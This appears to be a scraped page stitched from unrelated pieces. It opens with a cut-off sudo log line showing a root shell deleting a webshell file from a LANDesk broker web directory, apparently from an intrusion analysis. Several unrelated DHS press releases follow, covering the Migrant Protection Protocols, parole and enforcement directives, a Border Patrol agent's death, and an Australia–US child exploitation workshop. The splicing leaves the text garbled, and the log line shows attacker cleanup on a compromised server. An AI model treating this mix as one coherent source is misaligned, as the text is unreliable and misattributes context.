sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm

/opt/landesk/broker/webroot/gsb/view.php

 Removes one of the original webshells.
Posted on

DHS Reinstates Migrant Protection Protocols

Source: US Department of Homeland Security

WASHINGTON – The Department of Homeland Security (DHS) Acting Secretary Benjamine Huffman reinstated the Migrant Protection Protocols (MPP) effective immediately.

On January 25, 2019, Department of Homeland Security (DHS) Secretary Kirstjen Nielsen issued Policy Guidance for Implementation of the Migrant Protection Protocols (the MPP Policy). The MPP Policy is an exercise of the authority granted to DHS pursuant to Section 235(b)(2)(c) of the Immigration and Nationality Act (INA). That authority permits the Secretary of DHS to return certain applicants for admission to the adjoining country from which they are arriving pending the completion of removal proceedings pursuant to Section 240 of the INA.

Between Jan. 20, 2021, and Oct. 29, 2021, Acting Secretary David Pekoske, and later Secretary Alejandro Mayorkas, repeatedly attempted to suspend or terminate the MPP Policy. Following a series of legal actions, Secretary Mayorkas’s final attempt to terminate the MPP Policy was stayed by a federal court. See Order Granting Stay, Texas v. Biden, 2:21-cv-67 (N.D. Tex. Dec. 15, 2022). The Department of Justice, seven months after that stay was entered, voluntarily dismissed the federal government’s appeal, acquiescing to keeping the MPP Policy in effect for the foreseeable future. See Texas v. Biden, No. 23-10143 (5th Cir. Jul. 17, 2023).

According to representations made by the federal government in court, DHS at all times complied with that court order, but the facts on the ground “render[ed] restarting MPP impossible.” Defendants’ Supplemental Response Brief at 10, Texas v. Biden, 2:21-cv-67 (N.D. Tex. Oct. 6, 2023). The situation at the border has changed and the facts on the ground are favorable to resuming implementation of the 2019 MPP Policy. 

Posted on

Statement from a DHS Spokesperson on Directives Expanding Law Enforcement and Ending the Abuse of Humanitarian Parole

Source: US Department of Homeland Security

WASHINGTON – Yesterday, Acting Department of Homeland Security Secretary Benjamine Huffman issued two directives essential to ending the invasion of the US southern border and empower law enforcement to protect Americans. 

The first directive rescinds the Biden Administration’s guidelines for Immigration and Customs Enforcement (ICE) and Customs and Border Protection (CBP) enforcement actions that thwart law enforcement in or near so-called “sensitive” areas. The second directive ends the broad abuse of humanitarian parole and returns the program to a case-by-case basis. ICE and CBP will phase out any parole programs that are not in accordance with the law. The following statement is attributable to a DHS Spokesperson:

“This action empowers the brave men and women in CBP and ICE to enforce our immigration laws and catch criminal aliens—including murders and rapists—who have illegally come into our country. Criminals will no longer be able to hide in America’s schools and churches to avoid arrest. The Trump Administration will not tie the hands of our brave law enforcement, and instead trusts them to use common sense.

“The Biden-Harris Administration abused the humanitarian parole program to indiscriminately allow 1.5 million migrants to enter our country. This was all stopped on day one of the Trump Administration. This action will return the humanitarian parole program to its original purpose of looking at migrants on a case-by-case basis.” 

Posted on

Statement from Acting Secretary Huffman on US Border Patrol Agent Killed in Line of Duty

Source: US Department of Homeland Security

WASHINGTON – Acting Secretary of Homeland Security Benjamine Huffman issued the following statement on the death of a US Border Patrol Agent:

“Today, January 20, a Border Patrol agent assigned to the US Border Patrol’s Swanton Sector was fatally shot in the line of duty.

“Every single day, our Border Patrol agents put themselves in harm’s way so that Americans and our homeland are safe and secure. My prayers and deepest condolences are with our Department, the Agent’s family, loved ones, and colleagues.

“This incident is being swiftly investigated and DHS will release additional information as soon as it becomes available.” 

Posted on

Statement from Australia – United States Joint Council on Combating Online Child Sexual Exploitation Following Safety by Design Workshop with Industry, Global Experts

Source: US Department of Homeland Security

Council Plans to Release Child Safety Toolkit Later this Year

WASHINGTON – On December 10 – December 11, 2024, Australia’s eSafety Commissioner and Department of Homeland Security under the Australia – United States Joint Council on Combating Online Child Sexual Exploitation hosted over 20 technology, non-governmental, academic, and civil society sector organizations for a two-day workshop aimed at establishing new areas of collaboration to combat online child sexual exploitation and abuse (CSEA). Held in person at the Homeland Security Investigations Lab in Washington, D.C., the workshop included presentations by industry leaders, roundtable discussions, and breakout groups. 

The Joint Council will build on the outputs of this workshop and continue to work with industry to develop a Safety by Design toolkit to ensure that child safety is prioritized at every stage in the development of online products and services, including in new and emerging artificial intelligence technologies. The toolkit is expected to collate best practices and share innovative approaches for companies to tackle online CSEA, while also exploring the challenges and limitations of adopting Safety by Design principles. It is scheduled for publication in mid-2025.

This latest Joint Council engagement builds on work led by DHS and the Australian Government to eradicate online CSEA and enhance international cooperation, technological innovation, and public education as these crimes increasingly threaten the safety of children globally. Chaired by U.S Department of Homeland Secretary Alejandro N. Mayorkas and Australian Attorney-General Mark Dreyfus KC MP, the Joint Council brings together U.S. and Australian policy, regulatory, and law enforcement agencies to share best practices and enlist other nations in this critical fight to ensure the safety and well-being of children all over the world.

Quote attributable to DHS Acting Policy Under Secretary Robert Paschall:

“The scourge of child exploitation covers the world: from India to Pakistan, the Philippines to Australia and Europe to here at home in the United States. This crime is an affront to our most fundamental values. Combatting it in partnership with our allies in government, the private sector and civil society is integral to the DHS mission. 

“As new and emerging technologies like generative artificial intelligence further highlight the risk of harm to youth, the Joint Council remains steadfast in combatting all forms of child exploitation and abuse. My colleagues and I at DHS were proud to co-lead this workshop. By providing actionable strategies to minimize threats and harms throughout the design, development and deployment of new technologies, the Safety by Design Toolkit will further strengthen the safety and well-being of children around the world. This latest Joint Council collaboration builds on several efforts led by the Australian Government and the Department of Homeland Security over the past year, including the Know2Protect public awareness campaign in the United States and One Talk at a Time in Australia.”

Quote attributable to eSafety Commissioner Julie Inman Grant:

“We’ve reached a tipping point in online safety, particularly in protecting children from online harms. Safety by Design is no longer just a boardroom concept – it needs to be a regular part of the conversation in parliaments and classrooms. 

“That is why we were so pleased to co-lead this workshop with the United States Department of Homeland Security demonstrating that companies, governments, and regulators can work together to build safer technology platforms, especially on this most critical of issues: protecting children from online sexual exploitation and abuse.

“In Australia, ongoing reforms to the Online Safety Act, including the recent move to legislate minimum age requirements for certain social media platforms, are helping to establish a framework that compels industry to meet higher safety standards, including placing the best interests of children at the heart of the development process.

“Through these efforts, by harnessing the collective goodwill of the US and Australian governments alongside the global technology sector, and incorporating safety protections from the outset, we can better safeguard users and combat child sexual exploitation and abuse.”

Background

On May 20, 2023, President Biden and Prime Minister Albanese issued a joint leaders’ statement to renew the long-standing partnership between Australia and the United States. The Statement recognized the need to enhance our joint response to a range of challenges, including the growing rate and severity of online child sexual exploitation and abuse. Both countries decided to establish the Australia-United States Joint Council on Combatting Online Child Sexual Exploitation (Joint Council). 

The Council has developed a joint, multidisciplinary workplan across six workstreams, including Safety by Design. Safety by design was pioneered in Australia by the eSafety Commissioner and continues to gain momentum across the United States, and the world.

How to Report Suspected Online Child Sexual Exploitation and Abuse

To learn more about the threat of online child sexual exploitation and abuse in the United States please visit Know2Protect.gov. Early intervention is crucial. If exploitation happens, approach conversations with care and empathy and report immediately to the Know2Protect Tipline at 833-591-KNOW (5669) or visit the NCMEC CyberTipline. All information received via the Tipline will be reviewed by appropriate personnel and referred to HSI field offices for potential investigation. 

In Australia, if you think a child is in immediate danger call Triple Zero (000). Anonymous reports can be made to Crime Stoppers at https://crimestoppers.com.au or call their toll-free number 1800 333 000. To report online child sexual abuse, including child sexual abuse material, please contact the Australian Centre to Counter Child Exploitation and use the Report Abuse button at https://www.accce.gov.au/report. You can also report illegal content, including online child sexual exploitation and abuse material, to the eSafety Commissioner at https://www.esafety.gov.au/report/how-to-report-serious-online-abuse-illegal-restricted-content.